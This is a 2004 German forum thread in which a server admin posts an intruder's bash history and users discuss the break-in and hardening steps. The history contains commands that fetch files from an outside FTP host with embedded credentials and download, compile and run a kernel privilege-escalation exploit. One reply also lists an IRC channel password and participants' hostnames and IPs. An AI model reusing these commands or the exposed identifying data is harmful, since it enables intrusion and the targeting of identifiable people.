Page 1 of 2
Server wurde gehackt *_*
Posted: 2004-05-23 02:50
by recoilmaster
Blub !
Heute hats meine Kiste erwischt so wie ich es sehe sit er über nen Kernel Bug drauf gekommen.
Hier mal ein Auszug aus der .bash/history Hacker hat nicht aufgeraümt :)
Code: Select all
uname -a
cd /var/tmp
ls -al
mkdir ...
cd ...
dir
ftp 213.161.194.226 2400
chmod 777 *
./cy -d
dir
tar -xzf open*
cd open*
./configure
make
mkdir ../site
cd sta*/etc
rm ftpd.reg
wget ftp://root:r0xx0r@213.161.194.226:2400/ftpd.reg
../sbin/ftpd
cd ..
dir
cd log
dir
cat ftpd.err
netstat -an
cd ../etc
dir
rm ftpd.reg
wget ftp://root:r0xx0r@213.161.194.226:2400/ftpd.reg
../sbin/ftpd
/sbin/ifconfig
cd /proc
dir
cd net
dir
cat netlink
cat netstat
exit
dir
cd psy*
dir
cat psybnc.conf
cd /var/tmp/
dir
cd ...
dir
rm cy
rm ek*
cd open*
cd stan*/bin
dir
ftp 213.161.194.226 2400
tar -xzf poe-1*
cd poe*
cd POE*
perl Makefile.PL
make
cp -irf POE* ../
cd ..
tar -xzf poe-c*
cd POE-C*
perl Makefile.PL
make
dir
cp IRC.pm ../POE/Component/
cp Filter-IRC.pm ../POE/Filter/IRC.pm
cp Filter-CTCP.pm ../POE/Filter/CTCP.pm
cd ..
dir
ftp 213.161.194.226 2400
perl perlbot.pl
cd ../etc
cat default.cfg
cat sections.cfg
echo "">sections.cfg
cd sections
cp /var/tmp/.../site/*cfg ./
cd ../../bin
screen
ssh 62.141.54.185 -l test
exit
df
cd /var/tmp/...
dir
cd open*
cd stan*/etc/
cat sections.cfg
cd sections*
cat default.cfg
cd ../../sbin
./ftpd
cd ../bin
cat /var/tmp/.../pidfile
kill -9 28223
screen
../sbin/ftpd
cd /var/tmp/.../
dir
cat announce
cat pidfile
cat ann
/var/tmp/.../openftpd-0.29.4/standard/sbin/ftpd
exit
hostname -f
jah
uname -a
df
cd /
cd tmp
wget reve.dhs.org/kernelptrace.c
make kernelptrace
./kernelptrace
rm kernelptrace
rm kernelptrace.c
nano test.c
pico test.c
make test
./test
rm test
rm test.c
Oder liege ich da falsch ?
Reicht ein Kernelupdate oder soll ich die Kiste neu aufsetzen ?
Bye Keule
Re: Server wurde gehackt *_*
Posted: 2004-05-23 03:31
by sascha
Reicht ein Kernelupdate oder soll ich die Kiste neu aufsetzen ?
Bitte sag mir dass die Frage nicht ernst gemeint ist.
Re: Server wurde gehackt *_*
Posted: 2004-05-23 03:40
by recoilmaster
Ja ist ne dumme Frage ich weiss *_* hab aber sowas von 0 Bock die Kiste neu aufzusetzen, da steckt so viel Zeit drinnen
Scheiss Script Kiddys.
Re: Server wurde gehackt *_*
Posted: 2004-05-23 04:58
by r00ty
vorher wicher dir nochmal die logs damit du nachschauen kannst wo sie reingekommen sind
Re: Server wurde gehackt *_*
Posted: 2004-05-23 05:26
by mutombo
naja sonderlich clever sind die jungs nicht.
auf obigem ftp liegt ein perlscript für nen ftpbot, da steht server und pass der jungs drinne.
sind im efnet channel #stillhunted pass: 040404
kleine liste der user:
Code: Select all
#stillhunted _|p3rr0| H Jahwe@psybnc-user.gateway01.sHell1.de :4 _|p3rr0|
#stillhunted auzzi H ~auzzi@ati56.ati.ac.at :6 auzzi
#stillhunted anton52 H ~an@p5088E26E.dip0.t-ipconnect.de :3 anton52
#stillhunted beOND H KriZZ@pD956064D.dip.t-dialin.net :5 xxx
#stillhunted Indz|away H ~Indz@p50825CCB.dip.t-dialin.net :0 Indz
#stillhunted Zero_Cool H ~blabla@beh-ps.labs.pitt.edu :6 blabla
#stillhunted ACIID H ~lala@pD9FFF2C8.dip.t-dialin.net :0 ACIID
#stillhunted SiNUZ H ~123@beh-ps.labs.pitt.edu :5 321
#stillhunted |cartman- H ~netgear@h00508bf993b6.ne.client2.attbi.com :0 |cartman-
#stillhunted kichi H ~bitch@bliss.icemind.com :4 kichi
#stillhunted |Peach| H ~Peach@germol2-hosting.Kyiv.wnet.ua :4 |Peach|
#stillhunted bAsT|AWAY H dick@ns2.host-media.de :3 dick
#stillhunted SiL`- H SiL_@1337.vhost.at :3 SiL_
#stillhunted TU_GRAZ H ~AT-B0T@fstgal12.tu-graz.ac.at :0 GH
#stillhunted Koki|OFF H ~Koki@141.211.34.71 :4 Koki
#stillhunted deeflow H@ ~deeflow@in.meiner.jugend.bekam.ich.nur.Speed.und-cola.de :3 deeflow
#stillhunted mobber H@ ~mobber@ns3334.ovh.net :4 mobber
#stillhunted peer2k H muffin@chillt.im.garten-zum-traeumen.de :3 muffin
#stillhunted muhra|w H@ ~sexme@ns3334.ovh.net :4 sex
#stillhunted RaToR H tabaluga@kann.whois.lamer.nicht-leiden.de :3 Rator
#stillhunted RiMP^off H@ ~rimp@ns3334.ovh.net :5 rimp
#stillhunted Sky-Line- H@ Fox@tsg-ops.ath.cx :5 woops
#stillhunted ICET H+ rubby@frisst.kleine.kind3r.de :5 IceT
sind schon ein paar interessante ips dabei mit denen man recht einfach den realen besitzer zuordenen kann.
normalerweise hab ich ja nen gewissen respekt vor "hackern", aber das war ziemlich amateurhaft.
sieh mal zu das die einen auf den deckel bekommen :)
Re: Server wurde gehackt *_*
Posted: 2004-05-23 07:53
by captaincrunch
da steckt so viel Zeit drinnen
Und dann hattest du nicht einmal die Zeit, einen halbwegs sicheren Kernel zu installieren? *kopfschüttel*
Mal ernsthaft: mach die Kiste platt und bügel Backups drüber, selbst wenn du es hier definitiv nicht mit "Hackern", sondern mit anfängerhaften Scriptkiddies zu tun hast.
Re: Server wurde gehackt *_*
Posted: 2004-05-23 13:42
by recoilmaster
IP's gesammelt und Anzeige gegen unbekannt am Montag. Da wird sowieso nix draus, aber probieren kann manns *_*
Re: Server wurde gehackt *_*
Posted: 2004-05-23 13:58
by captaincrunch
Der FTP mag leer sein, aber woher nimmst du die Sicherheit, dass nicht doch noch irgendwelchen "Hinterlassenschaften" da sind?
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:15
by thomas80
Hallo,
hier kommt gleich mal die grosse böse noob-Frage: In der obig aufgelisteten bash hat der Angreifer doch schon root-Zugriff gehabt, oder nicht? Du sagtest ja, den hätte er über einen Kernel-exploit bekommen...muss man dazu eigentlich schon shell-Zugriff haben?? Und wie hat er den dann bekommen??
Gruß, Thomas
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:22
by recoilmaster
das ganze lief unter Benutzer nicht root Rechte, für den Angriff hat er den User Test genutzt.
geflashed hat er den ganzen Stuff von seinem Server 62.141.54.185 62 GB MP3's genutzt wurde das Programm openftpd mit einigen Plugins, wie z.B IRC Abfrage aus Ihrem Channel, wie mutombo bereits schrieb
efnet channel #stillhunted pass: 040404
@CaptainCrunch laut bash history wurde nichts weiteres gemacht ausser openftpd installation und flashen, werde aber die Kiste neu installieren.
Hab deren FTP geflashed und auf CD gebrannt, die CD geht mit zur Anzeige.
Waren recht dumme Script Kiddies, da sie noch nicht mal Ihre Spuren verwischt haben.
Kernel Bug wurde nicht genutzt, sie haben ein pass generator prog auf Ihrem FTP, mein pw war mit drinnen :/ war leider auch recht simpel, von daher selber schuld.
Man lernt erst wenn man eine drauf bekommt.
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:30
by xyloid
Recoilmaster wrote:
Kernel Bug wurde nicht genutzt, sie haben ein pass generator prog auf Ihrem FTP, mein pw war mit drinnen :/ war leider auch recht simpel, von daher selber schuld.
wie kann man auch bloß ein pw nehmen, das man womöglich noch in irgendeinem wörterbuch findet oder das sich von diesem "pass generator" ermitteln lässt.
wie du schon gesagt hast: da biste selbst schuld ;)
Nico
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:35
by Joe User
Bleibt nur zu hoffen, dass Deine anderen 27 (Kunden)Server besser administriert werden...
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:36
by wgot
Recoilmaster wrote:... für den Angriff hat er den User Test genutzt.
ganz sicher der optimale Username für einen SSH-Account! :roll: :oops:
Gruß, Wolfgang
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:41
by recoilmaster
Meine Meinung :lol:
Nie damit gerechnet und seid 1 Jahr nie was vorgefallen, von daher
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:42
by oxygen
Recoilmaster wrote:das ganze lief unter Benutzer nicht root Rechte, für den Angriff hat er den User Test genutzt.
Natürlich hatte er Rootrechte, was glaubst du was
wget reve.dhs.org/kernelptrace.c
make kernelptrace
./kernelptrace
macht...
Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:43
by recoilmaster
Exploit für Kernel 2.20 ich weiss *_*
Re: Server wurde gehackt *_*
Posted: 2004-05-23 14:56
by compositiv
Recoilmaster wrote:IP's gesammelt und Anzeige gegen unbekannt am Montag. Da wird sowieso nix draus, aber probieren kann manns *_*
Vor allem wollen die Jungs den kompletten Rechner, dd-Image, Datenträger o.ä. reicht denen, zumindest in Hamburg, nicht.
Und wenn der Rechner nicht gemietet ist, sondern eine selbstangeschaffte "Hochleistungs"-maschine ist, wird da teilweise schon eine Menge Kapital unnötigerweise gebunden.
Re: Server wurde gehackt *_*
Posted: 2004-05-23 15:07
by Joe User
Re: Server wurde gehackt *_*
Posted: 2004-05-24 20:23
by silentfog
Recoilmaster wrote:Exploit für Kernel 2.20 ich weiss *_*
Du hast aber nicht zufällig u. a. die Domains megafoxes.de, europefashion.de etc. ?
Auf
http://www.zone-h.org/en/defacements/fi ... domain=de/ kann man denn auch wieder einen 'tüchtigen' und 'verantwortungsvollen' Admin finden:
Code: Select all
r00t_System owns your Linux!!!
id
uid=0(root) gid=0(root)
uname -a
Linux p15137761 2.4.20 #1 SMP Sun Dec 1 21:25:43 CET 2002 i686 unknown
Kopfschüttel :?: Stef.
Re: Server wurde gehackt *_*
Posted: 2004-05-24 20:47
by recoilmaster
nö sind nicht meine :)
Auf allen Kisten is nu neuster Kernel drauf + neue Passwörter + ssh2 *_* - sowas passiert mir nicht noch mal.
Re: Server wurde gehackt *_*
Posted: 2004-05-24 20:55
by silentfog
Recoilmaster wrote:nö sind nicht meine :)
Auf allen Kisten is nu neuster Kernel drauf + neue Passwörter + ssh2 *_* - sowas passiert mir nicht noch mal.
Hoffentlich
BTW. warum nicht gleich so :?:
Re: Server wurde gehackt *_*
Posted: 2004-05-24 22:15
by recoilmaster
Hab gedacht das mir sowas nicht passiert 8O , wie gesagt erst muss was apssieren bevor manns lernt *_*
Re: Server wurde gehackt *_*
Posted: 2004-05-24 22:52
by arnee
Besonders die 1&1 IP-Netze sind IMHO besonders gefährdet, weil die ganzen AutoExploit-Programme diese Netze wohl zuerst scannen, da sie dort wohl den quantitativ größten Erfolg haben dürften.
Re: Server wurde gehackt *_*
Posted: 2004-05-24 23:32
by silentfog
Recoilmaster wrote:Hab gedacht das mir sowas nicht passiert 8O , wie gesagt erst muss was apssieren bevor manns lernt *_*
:roll: Sorry folks - :? Aber da machen sich soviele Leute hier im Forum die größte Mühe und posten sich die Finger wund, opfern Ihre Freizeit, schauen auch über die eine oder ander "Unglaublichkeit" hinweg :!:
Natürlich auch aus Freude an der "Sache" selbst, aber es ist immer eine Art "Selbstlosigkeit" dabei ...
Und nun denke einmal darüber nach, Du hast ja immerin schon
Beiträge: 253, was Deine Aussage eigentlich impliziert ... :( - Denkst Du nicht, daß sich manch einer dann fragt : "Warum poste ich eigentlich ..."
Eigentlich kann es jedem "relativ Wurst" sein, was Du mit Deinem Server machst - Du bist letztendlich verantwortlich ...
Aber "wurmen" tut es einen dann doch , sprich es gehen einem dann doch so Gedanken durch den Kopf, wie : " Sag' mal , spinn ich, lese ich da wirklich ... - gibt's doch nicht - steht doch
g e n u g und
a u s f ü h r l i c h im rootforum.
Aber sicher hast Du recht, "bevor man sich nicht die Finger verbrannt hat, kennt man die Bedeutung von HEISS nicht ...
:roll: Stef.
Re: Server wurde gehackt *_*
Posted: 2004-06-02 12:14
by konni
øxygen wrote:
Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)
Für den Fall, dass ich mich jetzt lächerlich mache, aber ich bin so paranoid, und mach die "gefährlichen" Befehle immer auf 000, dann kann sie keiner ausführen, und wenn ich mal brauch kann man ja kurzzeitig umändern.